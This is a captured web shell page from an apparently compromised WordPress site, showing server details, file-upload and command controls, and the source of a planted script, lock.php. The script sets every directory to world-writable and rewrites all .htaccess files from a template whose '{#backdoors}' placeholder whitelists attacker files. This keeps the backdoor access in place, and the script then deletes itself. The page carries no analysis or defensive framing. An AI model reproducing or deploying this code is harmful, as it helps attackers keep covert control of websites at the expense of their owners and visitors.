403Webshell
Server IP : 104.21.38.3  /  Your IP : 172.69.176.135
Web Server : Apache
System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64
User : www ( 1000)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/wwwroot/savinassociates.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /www/wwwroot/savinassociates.com/lock.php
<?php
header('Content-Type: text/html;charset=utf-8');
error_reporting(E_ALL);

$seclevel = "|links.php|header.php";

define("ROOT", $_SERVER['DOCUMENT_ROOT']);
@chdir(ROOT);

$arr_paths = array();
get_arr_paths(ROOT);

function get_arr_paths($path)
{
    global $arr_paths;

    if ($handle = opendir($path)) {
        while (($file = readdir($handle)) !== false) {

            if ($file != "." && $file != "..") {
                if (is_dir($path . "/" . $file) && !is_link($path . '/' . $file)) {
                    $arr_paths[] = $path . "/" . $file;
                    get_arr_paths($path . "/" . $file);
                }
            }
        }
    }
}

function output_message($result)
{
    if (!is_array($result)) {
        return;
    }

    if (!isset($result['title'])) {
        $result['title'] = '';
    }

    if (isset($result['status']) && !empty($result['status'])) {
        if ($result['status'] == 200) {
            $status = '<font color="green">Success</font>';
        }

        if ($result['status'] == 500) {
            $status = '<font color="red">Fail</font>';
        }
    } else {
        $status = '';
    }

    echo '<h3>' . $result['title'] . '   ' . $status . '</h3>';

    if (sizeof($result['message']) > 0) {
        foreach ($result['message'] as $message) {
            $message = str_replace('success', '<font color="blue"><b>Success</b></font>', $message);
            $message = str_replace('fail', '<font color="red"><b>Fail</b></font>', $message);
            echo '<li>' . $message . '</li>';
        }
    }

    echo "<br />";
    echo "<br />";
}

$return_data = array();
$return_data['title'] = '修改.htaccess';

if (file_exists('.htaccesstem') && file_exists('.htaccessinfo')) {
    $contentorig = file_get_contents('.htaccesstem');
    $contentold = file_get_contents('.htaccessinfo');
    $htens = json_decode($contentold, true);

    if (file_exists('.htaccess') && !is_writable('.htaccess')) {
        $chmod_f_result = @chmod('.htaccess', 0644);
        if (!$chmod_f_result) {
            $return_data['message'][] = '.htaccess' . ' permission denied';
        }
    }
    if (file_exists('.htaccess')) {
        unlink('.htaccess');
        $contentidx = str_replace('{#backdoors}', 'index.php|wp-login.php' . $seclevel, $contentorig);
        $fpc_result = file_put_contents('.htaccess', $contentidx);

        if (!$fpc_result) {
            $return_data['message'][] = '.htaccess' . ' fail';
        }

    }

    foreach ($arr_paths as $a) {
        if (!is_writable($a)) {

            $chmod_result = @chmod($a, 0777);

            if (!$chmod_result) {
                $return_data['message'][] = $a . ' permission denied';
                continue;
            }
        }

        if (file_exists($a . '/.htaccess') && !is_writable($a . '/.htaccess')) {

            $chmod_f_result = @chmod($a . '/.htaccess', 0644);

            if (!$chmod_f_result) {
                $return_data['message'][] = $a . '/.htaccess' . ' permission denied';
                continue;
            }
        }

        if (file_exists($a . '/.htaccess')) {
            unlink($a . '/.htaccess');
        }
        $b = str_replace(ROOT . "/", "", $a);
        if (isset($htens[$b]) && $htens[$b] !== "") {
            if (substr($a, strpos($a, 'wp-admin')) === 'wp-admin') {
                $content = str_replace('{#backdoors}', 'index.php|wp-login.php|profile.php|load-styles.php|load-scripts.php|plugins.php|plugin-install.php|admin-ajax.php|update.php|admin.php|' . $htens[$b] . $seclevel, $contentorig);
            } else {
                $content = str_replace('{#backdoors}', $htens[$b] . $seclevel, $contentorig);
            }
        } else {
            if (substr($a, strpos($a, 'wp-admin')) === 'wp-admin') {
                $content = str_replace('{#backdoors}', 'index.php|wp-login.php|profile.php|load-styles.php|load-scripts.php|plugins.php|plugin-install.php|admin-ajax.php|update.php|admin.php' . $seclevel, $contentorig);
            } else {
                $content = str_replace('{#backdoors}', '', $contentorig);
            }
        }
        $fpc_result = file_put_contents($a . '/.htaccess', $content);

        if (!$fpc_result) {
            $return_data['message'][] = $a . '/.htaccess' . ' fail';
        }


    }

    $return_data['status'] = 200;
    $return_data['message'][] = '.htaccess modify success';
    output_message($return_data);

    unlink('.htaccesstem');
    unlink('.htaccessinfo');

} else {

    $return_data['status'] = 500;
    $return_data['message'][] = '.htaccesstem file not exists';
    $return_data['message'][] = '.htaccess modify fail';
    output_message($return_data);
}

unlink(__FILE__);

?>

Youez - 2016 - github.com/yon3zu
LinuXploit